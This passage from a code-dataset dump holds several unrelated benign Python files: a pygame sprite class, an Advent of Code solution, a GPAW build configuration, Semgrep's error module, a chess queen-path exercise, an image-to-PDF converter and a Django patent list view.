[]\n\t\tmaster_image = image\n\n\t\tmaster_width, master_height = master_image.get_size()\n\t\twidth = self.width\n\t\theight = self.height\n\t\tfor index in range(int(master_width/width)):\n\t\t\timages.append(master_image.subsurface((index*width,0,width,height)))\n\n\t\t#print( len(images) )\n\t\treturn images\n\t\t\t\n\tdef update(self):\n\t\t#if self.status == self.GOING_UP:\n\t\t#\tself.__animateUp()\n\t\t#elif self.status == self.GOING_DOWN:\n\t\t#\tself.__animateDown()\n\t\t#elif self.status == self.DIE:\n\t\t#\tself.__animateKill()\n\t\t\t\n\t\t#self.__setCurrentFrame(self.currentFrameIndex)\n\t\t\n\t\tself.image = self.imageMaster\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = (self.x, self.y)\n\t\t\n\t\t#self.__updateAnimationState()\n\t\t\n\t\tself.CheckEvents()\n\t\n\tdef CheckEvents(self):\n\t\tself.mouseDown()\n\t\t\n\t\t#keys = pygame.key.get_pressed()\n\t\t#if keys[pygame.K_LEFT]:\n\t\t#\tself.moveLeft()\n\t\t#if keys[pygame.K_RIGHT]:\n\t\t#\tself.moveRight()\n\t\t#if keys[pygame.K_UP]:\n\t\t#\tself.moveUp()\n\t\t#if keys[pygame.K_DOWN]:\n\t\t#\tself.moveDown()\n\t\t\t\n\tdef moveLeft(self):\n\t\tself.x -= 5\n\t\t\n\tdef moveRight(self):\n\t\tself.x += 5\n\t\t\n\tdef moveUp(self):\n\t\tself.y -= 5\n\t\t\n\tdef moveDown(self):\n\t\tself.y += 5\n\t\t\t\n\tdef mouseDown(self):\n\t\t\"\"\" boolean function. Returns True if the mouse is \n\t\t\tclicked over the sprite, False otherwise\n\t\t\"\"\"\n\t\t#print(\"Check Mouse Down?\")\n\t\tself.pressed = False\n\t\tif pygame.mouse.get_pressed() == (1, 0, 0):\n\t\t\tif self.rect.collidepoint(pygame.mouse.get_pos()):\n\t\t\t\tprint(\"MOUSE DOWN\")\n\t\t\t\tself.pressed = True\n\t\treturn self.pressed\n\n\tdef clicked(self):\n\t\t\"\"\" Boolean function. Returns True only if mouse\n\t\t\tis pressed and released over sprite\n\t\t\"\"\"\n\t\t#print(\"CHECK CLICKED?!\")\n\t\treleased = False\n\t\tif self.pressed:\n\t\t\tif pygame.mouse.get_pressed() == (0, 0, 0):\n\t\t\t\tif self.rect.collidepoint(pygame.mouse.get_pos()):\n\t\t\t\t\tprint(\"CLICKED!\")\n\t\t\t\t\treleased = True\n\t\t\treturn released\n\n\tdef kill(self):\n\t\tself.isAnimationActive = False\n\t\tprint(\"KILLED!\")\n\t\tself.__animateKill()\n\n\tdef __animateKill(self):\n\t\tprint(\"ANIMATING DEATH\")\n\t\t\n\tdef __animateUp(self):\n\t\t#print(\"ANIMATING UP\")\n\t\tprint(\"CurrentIndex: \", self.currentFrameIndex, \" TotalFrames: \", len( self.frames ) )\n\t\tif (self.currentFrameIndex < len( self.frames ) - 1 ):\n\t\t\tself.currentFrameIndex += 1\n\t\t\tprint(\"New Index\", self.currentFrameIndex)\n\t\n\tdef __animateDown(self):\n\t\t#print(\"ANIMATING DOwn\")\n\t\tif (self.currentFrameIndex > 0 ):\n\t\t\tself.currentFrameIndex -=1\n\t\t\t\n\tdef __updateAnimationState(self):\n\t\t#print(\"UPDATE ANIMATION STATE\")\n\t\tif( self.currentFrameIndex == 0 ):\n\t\t\tself.status = self.INACTIVE\n\t\telif( self.currentFrameIndex >= len( self.frames )-1 ):\n\t\t\tself.status = self.GOING_DOWN\n\n\tdef popUp(self):\n\t\tprint (\"POP UP\")\n\t\tself.status = self.GOING_UP\n\t\n\tdef popDown(self):\n\t\tprint (\"POP DOWN\")\n\t\tself.status = self.GOING_DOWN\n\nif __name__ == \"__main__\":\n\timport scene \n\tfrom scene import Scene\n\tfrom Girl import Girl\n\tfrom Buford import Buford\n\tgame = Scene()\n\tbuford = Buford()\n\tbuford.setImage(\"buford.gif\")\n\tgirl = Girl()\n\tgirl.setImage(\"girl.png\")\n\tchasingNeeb = ChasingNeeb()\n\tchasingNeeb.setImage(\"neeb_still.gif\")\n\tgame.sprites = [buford, girl, chasingNeeb]\n\tgame.start()\n","repo_name":"townsean/Buford","sub_path":"BufordSave/ChasingNeeb.py","file_name":"ChasingNeeb.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71728449746","text":"\ndef read_input(file_name):\n file = open(file_name, 'r')\n nums = []\n for line in file:\n line = int(line.strip())\n nums.append(line)\n return nums\n\n\ndef part1(preamble_len, nums):\n for i in range(preamble_len, len(nums)):\n num = nums[i]\n preamble = nums[i-preamble_len:i]\n valid = False\n for j in range(preamble_len):\n dif = num - preamble[j]\n if dif in (preamble[0:j] + preamble[j+1:preamble_len]):\n valid = True\n break\n if not valid:\n return num\n\n\ndef sum_list(nums):\n total = 0\n for num in nums:\n total += num\n return total\n\n\ndef part2(nums, inv_num):\n for i in range(len(nums)):\n for j in range(i, len(nums)):\n sub_list = nums[i:j+1]\n sum_sub_list = sum_list(sub_list)\n if sum_sub_list == inv_num:\n return min(sub_list) + max(sub_list)\n elif sum_sub_list > inv_num:\n break\n\n\ndef main():\n file = \"Part1Input.txt\"\n preamble_len = 25\n nums = read_input(file)\n inv_num = part1(preamble_len, nums)\n print(inv_num)\n print(part2(nums, inv_num))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZacharyRJohnson/Advent-of-Code","sub_path":"2020/Day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44074984121","text":"\"\"\"User provided customizations.\n\nHere one changes the default arguments for compiling _gpaw.so (serial)\nand gpaw-python (parallel).\n\nHere are all the lists that can be modified:\n\n* libraries\n* library_dirs\n* include_dirs\n* extra_link_args\n* extra_compile_args\n* runtime_library_dirs\n* extra_objects\n* define_macros\n* mpi_libraries\n* mpi_library_dirs\n* mpi_include_dirs\n* mpi_runtime_library_dirs\n* mpi_define_macros\n\nTo override use the form:\n\n libraries = ['somelib', 'otherlib']\n\nTo append use the form\n\n libraries += ['somelib', 'otherlib']\n\"\"\"\n\n# compiler = 'gcc'\n# mpicompiler = 'mpicc' # use None if you don't want to build a gpaw-python\n# mpilinker = 'mpicc'\n# platform_id = ''\n# scalapack = False\n\n# Use ScaLAPACK:\n# Warning! At least scalapack 2.0.1 is required!\n# See https://trac.fysik.dtu.dk/projects/gpaw/ticket/230\nif scalapack:\n libraries += ['scalapack-openmpi',\n 'blacsCinit-openmpi',\n 'blacs-openmpi']\n define_macros += [('GPAW_NO_UNDERSCORE_CBLACS', '1')]\n define_macros += [('GPAW_NO_UNDERSCORE_CSCALAPACK', '1')]\n\n# LibXC:\n# In order to link libxc installed in a non-standard location\n# (e.g.: configure --prefix=/home/user/libxc-2.0.1-1), use:\n\n# - static linking:\nif 0:\n include_dirs += ['/home/user/libxc-2.0.1-1/include']\n extra_link_args += ['/home/user/libxc-2.0.1-1/lib/libxc.a']\n if 'xc' in libraries:\n libraries.remove('xc')\n\n# - dynamic linking (requires rpath or setting LD_LIBRARY_PATH at runtime):\nif 0:\n include_dirs += ['/home/user/libxc-2.0.1-1/include']\n library_dirs += ['/home/user/libxc-2.0.1-1/lib']\n # You can use rpath to avoid changing LD_LIBRARY_PATH:\n # extra_link_args += ['-Wl,-rpath=/home/user/libxc-2.0.1-1/lib']\n if 'xc' not in libraries:\n libraries.append('xc')\n\n\n# libvdwxc:\nif 0:\n libvdwxc = True\n path = '/home/user/libvdwxc'\n extra_link_args += ['-Wl,-rpath=%s/lib' % path]\n library_dirs += ['%s/lib' % path]\n include_dirs += ['%s/include' % path]\n libraries += ['vdwxc']\n\n\n# Build MPI-interface into _gpaw.so:\nif 0:\n compiler = 'mpicc'\n define_macros += [('PARALLEL', '1')]\n mpicompiler = None\n","repo_name":"ray38/gpawDFT","sub_path":"customize.py","file_name":"customize.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33417247014","text":"import dataclasses\nimport inspect\nimport sys\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import cast\nfrom typing import List\nfrom typing import Optional\nfrom typing import Sequence\nfrom typing import Tuple\n\nimport attr\n\nimport semgrep.semgrep_interfaces.semgrep_output_v1 as out\nfrom semgrep.constants import Colors\nfrom semgrep.rule_lang import Position\nfrom semgrep.rule_lang import SourceTracker\nfrom semgrep.rule_lang import Span\nfrom semgrep.util import with_color\nfrom semgrep.verbose_logging import getLogger\n\nlogger = getLogger(__name__)\n\nOK_EXIT_CODE = 0\nFINDINGS_EXIT_CODE = 1\nFATAL_EXIT_CODE = 2\nTARGET_PARSE_FAILURE_EXIT_CODE = 3\nRULE_PARSE_FAILURE_EXIT_CODE = 4\nUNPARSEABLE_YAML_EXIT_CODE = 5\n# the commented one below are not used anymore\n# NEED_ARBITRARY_CODE_EXEC_EXIT_CODE = 6\nMISSING_CONFIG_EXIT_CODE = 7\nINVALID_LANGUAGE_EXIT_CODE = 8\n# MATCH_TIMEOUT_EXIT_CODE = 9\n# MATCH_MAX_MEMORY_EXIT_CODE = 10\n# LEXICAL_ERROR_EXIT_CODE = 11\n# TOO_MANY_MATCHES_EXIT_CODE = 12\nINVALID_API_KEY_EXIT_CODE = 13\nSCAN_FAIL_EXIT_CODE = 14\n\ndefault_level = out.ErrorSeverity(out.Error_())\n\n\nclass SemgrepError(Exception):\n \"\"\"\n Parent class of all exceptions we anticipate in Semgrep commands\n\n All Semgrep Exceptions are caught and their error messages\n are displayed to the user.\n\n For pretty-printing, exceptions should override `__str__`.\n \"\"\"\n\n # In theory we should define those fields here:\n # code: int\n # level: out.ErrorSeverity\n # type_: out.CoreErrorKind\n\n def __init__(\n self,\n *args: object,\n code: int = FATAL_EXIT_CODE,\n level: out.ErrorSeverity = default_level,\n ) -> None:\n self.code = code\n self.level = level\n super().__init__(*args)\n\n def to_CliError(self) -> out.CliError:\n err = out.CliError(code=self.code, type_=self.type_(), level=self.level)\n return self.adjust_CliError(err)\n\n # to be overridden in children\n def type_(self) -> out.ErrorType:\n return out.ErrorType(out.SemgrepError())\n\n # to be overridden in children\n def adjust_CliError(self, base: out.CliError) -> out.CliError:\n \"\"\"\n Default implementation. Subclasses should override to provide custom information.\n \"\"\"\n return dataclasses.replace(base, message=str(self))\n\n def format_for_terminal(self) -> str:\n level_tag = (\n with_color(Colors.red, \"[\", bgcolor=Colors.red)\n + with_color(\n Colors.forced_white,\n cast(str, self.level.to_json()).upper(),\n bgcolor=Colors.red,\n bold=True,\n )\n + with_color(Colors.red, \"]\", bgcolor=Colors.red)\n )\n\n return f\"{level_tag} {self}\"\n\n\n# used in text and sarif output, and currently also stored in our metrics\n# payload.errors.errors\ndef error_type_string(type_: out.ErrorType) -> str:\n # convert to the same string of out.ParseError for now\n if isinstance(type_.value, out.PartialParsing):\n return error_type_string(out.ErrorType(out.ParseError()))\n # constructors with arguments\n if isinstance(type_.value, out.PatternParseError):\n return error_type_string(out.ErrorType(out.PatternParseError0()))\n if isinstance(type_.value, out.IncompatibleRule_):\n return error_type_string(out.ErrorType(out.IncompatibleRule0()))\n # All the other cases don't have arguments in Semgrep_output_v1.atd\n # and have some annotations to generate the right string\n else:\n return str(type_.to_json())\n\n\n@dataclass(frozen=True)\nclass SemgrepCoreError(SemgrepError):\n code: int\n level: out.ErrorSeverity\n # TODO: spans are used only for PatternParseError\n spans: Optional[List[out.ErrorSpan]]\n core: out.CoreError\n\n def type_(self) -> out.ErrorType:\n return self.core.error_type\n\n def adjust_CliError(self, base: out.CliError) -> out.CliError:\n base = dataclasses.replace(base, message=str(self))\n if self.core.rule_id:\n base = dataclasses.replace(base, rule_id=self.core.rule_id)\n\n # For rule errors path is a temp file so for now will just be confusing to add\n if not isinstance(\n self.core.error_type.value, out.RuleParseError\n ) and not isinstance(self.core.error_type.value, out.PatternParseError):\n base = dataclasses.replace(base, path=self.core.location.path)\n\n if self.spans:\n base = dataclasses.replace(base, spans=self.spans)\n\n return base\n\n @property\n def is_special_interfile_analysis_error(self) -> bool:\n \"\"\"\n These errors indicate that multifile analysis did not\n successfully ran, but we were able to get results anyway.\n They should not block, but they are still errors so that\n they display as errors\n\n TODO remove this when we remove the interfile specific errors\n \"\"\"\n return isinstance(\n self.core.error_type.value, out.OutOfMemoryDuringInterfile\n ) or isinstance(self.core.error_type.value, out.TimeoutDuringInterfile)\n\n def is_timeout(self) -> bool:\n \"\"\"\n Return if this error is a match timeout\n \"\"\"\n return isinstance(self.core.error_type.value, out.Timeout)\n\n @property\n def _error_message(self) -> str:\n \"\"\"\n Generate error message exposed to user\n \"\"\"\n if self.core.rule_id:\n # For rule errors, the path is a temporary JSON file containing\n # the rule(s).\n if isinstance(self.core.error_type.value, out.RuleParseError) or isinstance(\n self.core.error_type.value, out.PatternParseError\n ):\n error_context = f\"in rule {self.core.rule_id.value}\"\n elif isinstance(self.core.error_type.value, out.IncompatibleRule_):\n error_context = self.core.rule_id.value\n elif isinstance(self.core.error_type.value, out.MissingPlugin):\n error_context = f\"for rule {self.core.rule_id.value}\"\n else:\n # This message is suitable only if the error is in a target file:\n error_context = f\"when running {self.core.rule_id.value} on {self.core.location.path.value}\"\n else:\n error_context = f\"at line {self.core.location.path.value}:{self.core.location.start.line}\"\n\n return f\"{error_type_string(self.core.error_type)} {error_context}:\\n {self.core.message}\"\n\n @property\n def _stack_trace(self) -> str:\n \"\"\"\n Returns stack trace if error_type is Fatal error else returns empty strings\n \"\"\"\n if isinstance(self.core.error_type.value, out.FatalError):\n error_trace = self.core.details or \"\"\n return f\"\\n====[ BEGIN error trace ]====\\n{error_trace}=====[ END error trace ]=====\\n\"\n else:\n return \"\"\n\n def __str__(self) -> str:\n return self._error_message + self._stack_trace\n\n # TODO: I didn't manage to get out.Error to be hashable because it contains lists or\n # objects (e.g., Error_) which are not hashable\n def __hash__(self) -> int:\n return hash(\n (\n self.code,\n self.level,\n self.core.rule_id,\n self.core.error_type.kind,\n self.core.location.path.value,\n self.core.location.start,\n self.core.location.end,\n self.core.message,\n self.core.details,\n )\n )\n\n\n@attr.s(auto_attribs=True, frozen=True)\nclass FilesNotFoundError(SemgrepError):\n level = out.ErrorSeverity(out.Error_())\n code = FATAL_EXIT_CODE\n paths: Sequence[Path]\n\n def __str__(self) -> str:\n lines = (f\"File not found: {pathname}\" for pathname in self.paths)\n return \"\\n\".join(lines)\n\n\ndef span_list_to_tuple(spans: List[Span]) -> Tuple[Span, ...]:\n \"\"\"\n Helper converter so mypy can track that we are converting\n from list of spans to tuple of spans\n \"\"\"\n return tuple(spans)\n\n\ndef add_to_line(pos: Position, num_lines: int) -> Position:\n return Position(col=pos.col, line=pos.line + num_lines, offset=-1)\n\n\ndef previous_line(pos: Position) -> Position:\n return add_to_line(pos, -1)\n\n\ndef next_line(pos: Position) -> Position:\n return add_to_line(pos, 1)\n\n\n@attr.s(auto_attribs=True, eq=True, frozen=True)\nclass ErrorWithSpan(SemgrepError):\n \"\"\"\n In general, you should not be constructing ErrorWithSpan directly, and instead be constructing a subclass\n that sets the code.\n\n Error which will print context from the Span. You should provide the most specific span possible,\n eg. if the error is an invalid key, provide exactly the span for that key. You can then expand what's printed\n with span.with_context(...). Conversely, if you don't want to display the entire span, you can use `span.truncate`\n\n The __str__ method produces the pretty-printed error.\n Here is what the generated error will look like:\n\n : \n --> :\n 1 | rules:\n 2 | - id: eqeq-is-bad\n 3 | pattern-inside: foo(...)\n | ^^^^^^^^^^^^^^\n 4 | patterns:\n 5 | - pattern-not: 1 == 1\n = help: \n \n\n :param short_msg: 1 or 2 word description of the problem (eg. missing key)\n :param level: How bad is the problem? error,warn, etc.\n :param spans: A list of spans to display for context.\n :help help: An optional hint about how to fix the problem\n :cause cause: The underlying exception\n \"\"\"\n\n short_msg: str = attr.ib()\n long_msg: Optional[str] = attr.ib()\n spans: List[Span] = attr.ib(converter=span_list_to_tuple)\n help: Optional[str] = attr.ib(default=None)\n\n def __attrs_post_init__(self) -> None:\n if not hasattr(self, \"code\"):\n raise ValueError(\"Inheritors of SemgrepError must define an exit code\")\n\n if not hasattr(self, \"level\"):\n raise ValueError(\"Inheritors of SemgrepError must define a level\")\n\n def adjust_CliError(self, base: out.CliError) -> out.CliError:\n base = dataclasses.replace(\n base,\n short_msg=self.short_msg,\n long_msg=self.long_msg,\n level=self.level,\n spans=[s.to_ErrorSpan() for s in self.spans],\n )\n # otherwise, we end up with `help: null` in JSON\n if self.help:\n base = dataclasses.replace(base, help=self.help)\n return base\n\n @staticmethod\n def _line_number_width(span: Span) -> int:\n return len(str((span.context_end or span.end).line)) + 1\n\n @staticmethod\n def _format_line_number(span: Span, line_number: Optional[int]) -> str:\n \"\"\"\n Produce a string like:\n ` 10 |`\n\n The amount of padding is set for printing within `span` (so it handles up to `context_end.line`)\n \"\"\"\n # line numbers are 0 indexed\n width = ErrorWithSpan._line_number_width(span)\n if line_number is not None:\n base_str = str(line_number)\n assert len(base_str) < width\n return with_color(Colors.bright_blue, base_str.ljust(width) + \"| \")\n else:\n return with_color(Colors.bright_blue, \"\".ljust(width) + \"| \")\n\n def _format_code_segment(\n self,\n start: Position,\n end: Position,\n source: List[str],\n part_of_span: Span,\n ) -> List[str]:\n \"\"\"\n Line by line output for a snippet of code from `start_line` to `end_line`\n Each line will be annotated with a line number, properly spaced according to\n the highest line number required to render `span`\n\n :param start: start position\n :param end: end position\n\n :returns A list of strings, suitable to be combined with `'\\n'.join(...)`\n eg:\n List[\n \"5 | def my_func():\",\n \"6 | return True\"\n ]\n \"\"\"\n # -1 because positions are 1-indexed\n code_segment = source[start.line - 1 : end.line]\n snippet = []\n for line_num, line in zip(range(start.line, end.line + 1), code_segment):\n snippet.append(f\"{self._format_line_number(part_of_span, line_num)}{line}\")\n return snippet\n\n def __str__(self) -> str:\n return self.short_msg\n\n def format_for_terminal(self) -> str:\n \"\"\"\n Format this exception into a pretty string with context and color\n \"\"\"\n header = f\"{with_color(Colors.red, 'semgrep ' + self.level.to_json())}: {self.short_msg}\"\n snippets = []\n for span in self.spans:\n if span.file != \"semgrep temp file\":\n location_hint = f\" --> {span.file}:{span.start.line}\"\n snippet = [location_hint]\n else:\n snippet = []\n\n # all the lines of code in the file this comes from\n source: List[str] = SourceTracker.source(span.source_hash)\n\n # First, print the span from `context_start` to `start`\n # Next, sprint the focus of the span from `start` to `end`\n # If the actual span is only 1 line long, use `column` information to highlight the exact problem\n # Finally, print end context from `end` to `context_end`\n if span.context_start:\n snippet += self._format_code_segment(\n span.context_start, previous_line(span.start), source, span\n )\n snippet += self._format_code_segment(span.start, span.end, source, span)\n # Currently, only span highlighting if it's a one line span\n if span.start.line == span.end.line:\n error = with_color(Colors.red, (span.end.col - span.start.col) * \"^\")\n snippet.append(\n self._format_line_number(span, None)\n + \" \" * (span.start.col - 1)\n + error\n )\n if span.context_end:\n snippet += self._format_code_segment(\n next_line(span.end), span.context_end, source, span\n )\n\n snippets.append(\"\\n\".join(snippet))\n snippet_str = \"\\n\".join(snippets)\n if self.help:\n help_str = f\"= {with_color(Colors.cyan, 'help', bold=True)}: {self.help}\"\n else:\n help_str = \"\"\n\n # TODO remove this when temp files are no longer in error messages\n if snippet_str == \"\":\n snippet_str_with_newline = \"\"\n else:\n snippet_str_with_newline = f\"{snippet_str}\\n\"\n return f\"{header}\\n{snippet_str_with_newline}{help_str}\\n{with_color(Colors.red, self.long_msg or '')}\\n\"\n\n\n@attr.s(frozen=True, eq=True)\nclass InvalidRuleSchemaError(ErrorWithSpan):\n code = RULE_PARSE_FAILURE_EXIT_CODE\n level = out.ErrorSeverity(out.Error_())\n\n def type_(self) -> out.ErrorType:\n return out.ErrorType(out.InvalidRuleSchemaError())\n\n\n@attr.s(frozen=True, eq=True)\nclass UnknownLanguageError(ErrorWithSpan):\n code = INVALID_LANGUAGE_EXIT_CODE\n level = out.ErrorSeverity(out.Error_())\n\n def type_(self) -> out.ErrorType:\n return out.ErrorType(out.UnknownLanguageError())\n\n\n# cf. https://stackoverflow.com/questions/1796180/how-can-i-get-a-list-of-all-classes-within-current-module-in-python/1796247#1796247\n# This is used only in join_rules.py\nERROR_MAP = {\n classname: classdef\n for classname, classdef in inspect.getmembers(\n sys.modules[__name__],\n lambda member: inspect.isclass(member) and member.__module__ == __name__,\n )\n}\n","repo_name":"semgrep/semgrep","sub_path":"cli/src/semgrep/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":15709,"program_lang":"python","lang":"en","doc_type":"code","stars":9057,"dataset":"github-code","pt":"48"} +{"seq_id":"35471228945","text":"def printbox(length,width,qx,qy,obstacles,path):\n for x in range(1,length+1):\n for y in range(1,width+1):\n if [x,y] == [qx,qy]:\n print (\" Q \"),\n elif [x,y] in path:\n print(\" $ \"),\n elif [x,y] in obstacles:\n print(\" 8 \"),\n else:\n print(\" . \"),\n print(\"\\n\")\n\ndef findN(n,k,q_x,q_y,obstacle):\n path = []\n\n x = q_x\n y = q_y\n while x < n :\n x += 1\n\n if [x, y] in obstacles:\n break\n path.append([x, y])\n\n x = q_x\n y = q_y\n while x > 1:\n x -= 1\n\n if [x, y] in obstacles:\n break\n path.append([x, y])\n\n x = q_x\n y = q_y\n while y < n:\n y += 1\n\n if [x, y] in obstacles:\n break\n path.append([x, y])\n\n x = q_x\n y = q_y\n while y > 1:\n y -= 1\n\n if [x, y] in obstacles:\n break\n path.append([x, y])\n\n\n\n\n x = q_x\n y = q_y\n while x 1 and y > 1:\n x -= 1\n y -= 1\n if [x,y] in obstacles:\n break\n path.append([x, y])\n\n x = q_x\n y = q_y\n while x < n and y > 1:\n x += 1\n y -= 1\n if [x,y] in obstacles:\n break\n path.append([x, y])\n\n x = q_x\n y = q_y\n while x > 1 and y < n:\n x -= 1\n y += 1\n if [x,y] in obstacles:\n break\n path.append([x, y])\n\n return path\n\n\n\ndef calculateN(n,k,q_x,q_y,obstacle):\n xp = length-q_x\n xn = q_x-1\n yp = length-q_y\n yn = q_y-1\n pp = min(length-q_x,length-q_y)\n pm = min(q_y-1,length-q_x)\n mp = min(q_x-1,length-q_y)\n mm = min(q_x-1,q_y-1)\n\n for [x,y] in obstacle:\n if x == q_x:\n if q_y-y-1 < yn and q_y-y-1 >= 0 :\n yn = qy-y-1\n\n if y-q_y-1 < yp and y-q_y-1 >= 0:\n yp = y-q_y-1\n\n if y == q_y:\n\n if q_x - x - 1 < xn and q_x - x - 1 >= 0:\n xn = qx - x - 1\n\n if x - q_x - 1 < xp and x - q_x - 1 >= 0:\n xp = x - q_x - 1\n\n if abs(q_x-x) == abs(q_y-y):\n if q_x < x:\n if q_y < y:\n temp = min(x-q_x,y-q_y)-1\n if pp > temp:\n pp = temp\n if q_y > y:\n temp = min(x-q_x,q_y-y)-1\n if pm > temp:\n pm = temp\n\n elif q_y < y:\n temp = min(q_x-x,y-q_y)-1\n if mp > temp:\n mp = temp\n\n elif q_y >y:\n temp = min(q_x-x,q_y-y)-1\n if mm > temp:\n mm = temp\n\n\n print(\"pp = \"),\n print(pp)\n print(\"mp = \"),\n print(mp)\n print(\"pm = \"),\n print(pm)\n print(\"mm = \"),\n print(mm)\n\n number = xp+xn+yp+yn+pp+mp+pm+mm\n\n return number\n\n\nlength = 11\nqx = 5\nqy = 5\nobstacles = [[5,1],[5,11],[1,5],[11,5],[5,3],[11,11],[7,7],[1,1],[3,3],[7,3],[3,7]]\npath = []\n\npath = findN(length,len(obstacles),qx,qy,obstacles)\n\nprint(path)\nprint(len(path))\n\nprintbox(length,length,qx,qy,obstacles,path)\n\nprint(calculateN(length,len(obstacles),qx,qy,obstacles))","repo_name":"adhirathan/python","sub_path":"queen.py","file_name":"queen.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29831581927","text":"# -*- coding: utf-8 -*-#\n# -------------------------------------------------------------------------------\n# Author: A\n# Date: 2020-09-08\n# -------------------------------------------------------------------------------\nfrom fpdf import FPDF\nfrom PIL import Image\nimport os\nimport time\n\n\ndef makePdf(pdfFileName, listPages):\n \"\"\"图片转PDF\"\"\"\n maxw_list = []\n maxh_list = []\n for one_p in listPages:\n cover = Image.open(one_p)\n width, height = cover.size\n maxh_list.append(height)\n maxw_list.append(width)\n try:\n width_m = max(maxw_list)\n height_m = max(maxh_list)\n except:\n width_m = 2339\n height_m = 1654\n pdf = FPDF(unit=\"pt\", format=[width_m, height_m])\n for page in listPages:\n pdf.add_page()\n pdf.image(page, 0, 0)\n pdf.output(pdfFileName, \"F\")\n\n\nf_path = r'F:\\out'\nf_list = os.listdir(f_path)\npp = r'F:\\calc'\nfor one_dir in f_list:\n print(one_dir)\n pictures_path = os.path.join(f_path, one_dir)\n out_path = os.path.join(f_path, one_dir + \".pdf\")\n if os.path.exists(os.path.join(pp, one_dir + \".pdf\")):\n print(\"文件已创建\")\n else:\n pictures_list = []\n for roots, dirs, files in os.walk(pictures_path):\n for one_picture in files:\n if str(one_picture).endswith(\"jpg\" or \"png\"):\n sizzz = Image.open(os.path.join(roots, one_picture))\n width, height = sizzz.size\n if width < height:\n pass\n else:\n ak = sizzz.transpose(Image.ROTATE_90)\n ak.save(os.path.join(roots, one_picture))\n one_picture_path = os.path.join(roots, one_picture)\n pictures_list.append(one_picture_path)\n makePdf(out_path, pictures_list)\n","repo_name":"runker54/Project","sub_path":"PDF/image_TO_pdf.py","file_name":"image_TO_pdf.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38952686120","text":"# _*_ coding: utf-8 _*_\nimport json\n\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\n\nfrom .models import Patent\nfrom .forms import AddPatentForm, ModifyPatentForm\nfrom operation.models import UserFavorite\n\n\n# Create your views here.\n\nclass PatentListView(View):\n def get(self, request):\n all_patent = Patent.objects.filter(if_show=True)\n field_category = request.GET.get('field_category', '')\n patent_category = request.GET.get('patent_category', '')\n price_down = request.GET.get('price_down', '')\n price_up = request.GET.get('price_up', '')\n\n newest_patent = all_patent.order_by('-add_time')[:10]\n\n # field_categorys = all_patent.values_list('field_category').distinct()\n # FIELD = {\n # '0': u'食品饮料', '1': u'建筑建材', '2': u'家居用品', '3': u'轻工纺织', '4': u'化学化工', '5': u'新能源', '6': u'机械',\n # '7': u'环保和资源', '8': u'橡胶塑料', '9': u'仪器仪表', '10': u'新型材料', '11': u'电子信息', '12': u'医药与医疗',\n # '13': u'农林牧业', '14': u'海洋开发', '15': u'航空航天', '16': u'采矿冶金', '17': u'电气自动化', '18': u'包装印刷',\n # '19': u'教育休闲', '20': u'钒钛产业', '21': u'安全防护', '22': u'交通运输'\n # }\n FIELD = (\n ('0', u'食品饮料'), ('1', u'建筑建材'), ('2', u'家居用品'), ('3', u'轻工纺织'), ('4', u'化学化工'), ('5', u'新能源'),\n ('6', u'机械'),\n ('7', u'环保和资源'), ('8', u'橡胶塑料'), ('9', u'仪器仪表'), ('10', u'新型材料'), ('11', u'电子信息'), ('12', u'医药与医疗'),\n ('13', u'农林牧业'), ('14', u'海洋开发'), ('15', u'航空航天'), ('16', u'采矿冶金'), ('17', u'电气自动化'), ('18', u'包装印刷'),\n ('19', u'教育休闲'), ('20', u'钒钛产业'), ('21', u'安全防护'), ('22', u'交通运输'))\n\n # field_categorys_array = []\n # for field_category in field_categorys:\n # field_categorys_array.append({'key': field_category[0], 'value': FIELD[field_category[0]]})\n\n patent_categorys = all_patent.values_list('patent_category').distinct()\n # PATENT = {\n # 'fmzl': u'发明专利', 'syxxzl': u'实用新型专利', 'wgzl': '外观专利'\n # }\n PATENT = (('fmzl', u'发明专利'), ('syxxzl', u'实用新型专利'), ('wgzl', '外观专利'))\n # patent_categorys_array = []\n # for patent_category in patent_categorys:\n # patent_categorys_array.append({'key': patent_category[0], 'value': PATENT[patent_category[0]]})\n\n if field_category:\n all_patent = all_patent.filter(field_category=field_category)\n if patent_category:\n all_patent = all_patent.filter(patent_category=patent_category)\n if price_down:\n all_patent = all_patent.filter(price__gte=price_down)\n if price_up:\n all_patent = all_patent.filter(price__lte=price_up)\n\n patent_nums = all_patent.count()\n\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n p = Paginator(all_patent, 10, request=request)\n\n patent = p.page(page)\n\n # patents = patent.object_list\n # patents_=[]\n\n for patent_ in patent.object_list:\n patent_.has_fav = False\n if request.user.is_authenticated:\n if UserFavorite.objects.filter(user=request.user, fav_id=patent_.id, fav_type=1):\n patent_.has_fav = True\n # patents_.append(patent_)\n #\n # patent.object_list = patents_\n\n return render(request, 'patent-list.html', {\n 'current_page': 'patent',\n 'newest_patent': newest_patent,\n 'all_patent': patent,\n 'patent_nums': patent_nums,\n 'field_category_id': field_category,\n 'patent_category_id': patent_category,\n 'price_down': price_down,\n 'price_up': price_up,\n 'field_categorys': FIELD,\n 'patent_categorys': PATENT\n })\n\n\nclass PatentDetailView(View):\n def get(self, request, patent_id):\n # 此处的id为表默认为我们添加的值。\n patent = Patent.objects.get(id=int(patent_id))\n # 增加专利点击数\n patent.click_num += 1\n patent.save()\n\n # 是否收藏\n has_fav_patent = False\n\n # 必须是用户已登录我们才需要判断。\n if request.user.is_authenticated:\n if UserFavorite.objects.filter(user=request.user, fav_id=patent.id, fav_type=1):\n has_fav_patent = True\n # 取出标签找到标签相同的patent\n keyword = 